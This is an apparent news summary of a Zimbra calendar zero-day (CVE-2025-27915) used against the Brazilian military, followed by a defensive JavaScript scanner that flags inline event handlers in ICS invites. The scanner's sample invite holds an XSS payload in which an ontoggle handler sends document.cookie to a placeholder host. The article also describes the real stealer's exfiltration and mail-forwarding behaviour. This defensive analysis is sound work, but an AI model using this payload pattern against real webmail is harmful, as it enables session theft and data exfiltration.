Particle.news


Zimbra Calendar Zero-Day Used in Targeted Attack on Brazilian Military

StrikeReady describes spoofed Libyan Navy invites that executed data-stealing JavaScript through CVE-2025-27915.

Overview

  • Researchers say exploitation began in early January, weeks before Zimbra shipped fixes on January 27 in versions 9.0.0 P44, 10.0.13, and 10.1.5; the release did not acknowledge that the flaw was already being exploited in the wild.
  • The flaw in the Classic Web Client is a stored XSS: HTML inside a malicious ICS invite is not sanitized, so an ontoggle handler on a details tag fires and runs attacker-supplied JavaScript in the victim's authenticated webmail session.
  • The embedded script was a stealthy data stealer that exfiltrated credentials, emails, contacts, and shared folders to ffrk[.]net and installed a mail filter rule named Correo that forwards messages to [email protected].
  • Evasion features included a 60-second start delay, execution gated on a three-day window having elapsed, periodic uploads roughly every four hours, and hidden UI elements so the victim saw fewer signs of tampering.
  • Attribution remains unclear. Researchers noted similarities to past UNC1151 campaigns and to broader XSS use by actors such as APT28, and they released IoCs and a deobfuscated payload to aid defenders.
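The ICS-borne XSS vector described above, as an added example that is not part of the StrikeReady report or of Zimbra's code: a small JavaScript scanner that unfolds an .ics body, pulls out the text properties a webmail client would render, and flags any HTML tag carrying an inline on* event handler such as ontoggle, together with a blocklist-style strip of those attributes for use at a mail gateway. The sample invite, the collector.invalid host, and the list of rendered properties are constructed assumptions for this illustration; nothing here reproduces the actual payload.

```javascript
// Added example (not Zimbra's or StrikeReady's code): scan an iCalendar (.ics)
// body for HTML tags carrying inline on* event handlers, the pattern behind the
// CVE-2025-27915 invites, and strip such attributes before rendering.
// The sample invite, the collector.invalid host and the property list below
// are constructed assumptions for illustration only.

// RFC 5545 folds long content lines as CRLF followed by a space or tab; undo that
// first, otherwise a handler split across a fold goes unseen.
function unfoldIcs(text) {
  return text.replace(/\r?\n[ \t]/g, '');
}

// Split each content line into NAME[;PARAMS]:VALUE and keep only the bare name.
function parseProps(text) {
  const props = [];
  for (const line of unfoldIcs(text).split(/\r?\n/)) {
    const sep = line.indexOf(':');
    if (sep < 0) continue;
    const name = line.slice(0, sep).split(';')[0].toUpperCase();
    props.push({ name, value: line.slice(sep + 1) });
  }
  return props;
}

// Properties a webmail client is likely to render as HTML (assumed list).
const RENDERED_TEXT_PROPS = new Set(['DESCRIPTION', 'X-ALT-DESC', 'SUMMARY', 'LOCATION', 'COMMENT']);
const TAG = /<[a-z][^>]*>/gi;              // opening tags only; closing tags carry no attributes
const HANDLER_ATTR = /\bon([a-z]+)\s*=/gi; // ontoggle=, onerror=, onload=, ...

// One finding per rendered property that contains a tag with an inline handler.
// Matching inside tags only keeps plain text like "one=two" from tripping the check.
function findInlineHandlers(icsText) {
  const findings = [];
  for (const { name, value } of parseProps(icsText)) {
    if (!RENDERED_TEXT_PROPS.has(name)) continue;
    const handlers = [];
    for (const tag of value.match(TAG) || []) {
      for (const m of tag.matchAll(HANDLER_ATTR)) handlers.push('on' + m[1].toLowerCase());
    }
    if (handlers.length) findings.push({ property: name, handlers });
  }
  return findings;
}

// Blocklist-style hardening: drop every on*="..." attribute from a tag's HTML.
// Adequate for a gateway rule; a client should use an allowlist sanitizer instead.
function stripInlineHandlers(html) {
  return html.replace(/\s+on[a-z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '');
}

// Constructed invite: the handler sits on a <details open> tag, so it fires as soon as
// the element is parsed, with no click from the victim. The fetch target is a placeholder.
const SAMPLE_ICS = [
  'BEGIN:VCALENDAR',
  'VERSION:2.0',
  'PRODID:-//constructed sample//EN',
  'BEGIN:VEVENT',
  'UID:constructed-invite-1',
  'SUMMARY:Joint exercise planning',
  'X-ALT-DESC;FMTTYPE=text/html:<html><body><details open ontoggle="fetch(\'https://collector.invalid/?c=\'+document.cookie)">',
  ' agenda</details></body></html>',   // folded continuation line
  'END:VEVENT',
  'END:VCALENDAR',
].join('\r\n');

console.log(JSON.stringify(findInlineHandlers(SAMPLE_ICS)));
// [{"property":"X-ALT-DESC","handlers":["ontoggle"]}]
```

The reason a details tag is a useful carrier for an attacker is that the toggle event fires when the open attribute is set at parse time, so the script runs on preview with no user interaction. Stripping on* attributes is a stopgap for triage and gateway filtering; the fix is the patched Zimbra release, and any client that must render calendar HTML should sanitize with an allowlist library such as DOMPurify rather than a regex blocklist.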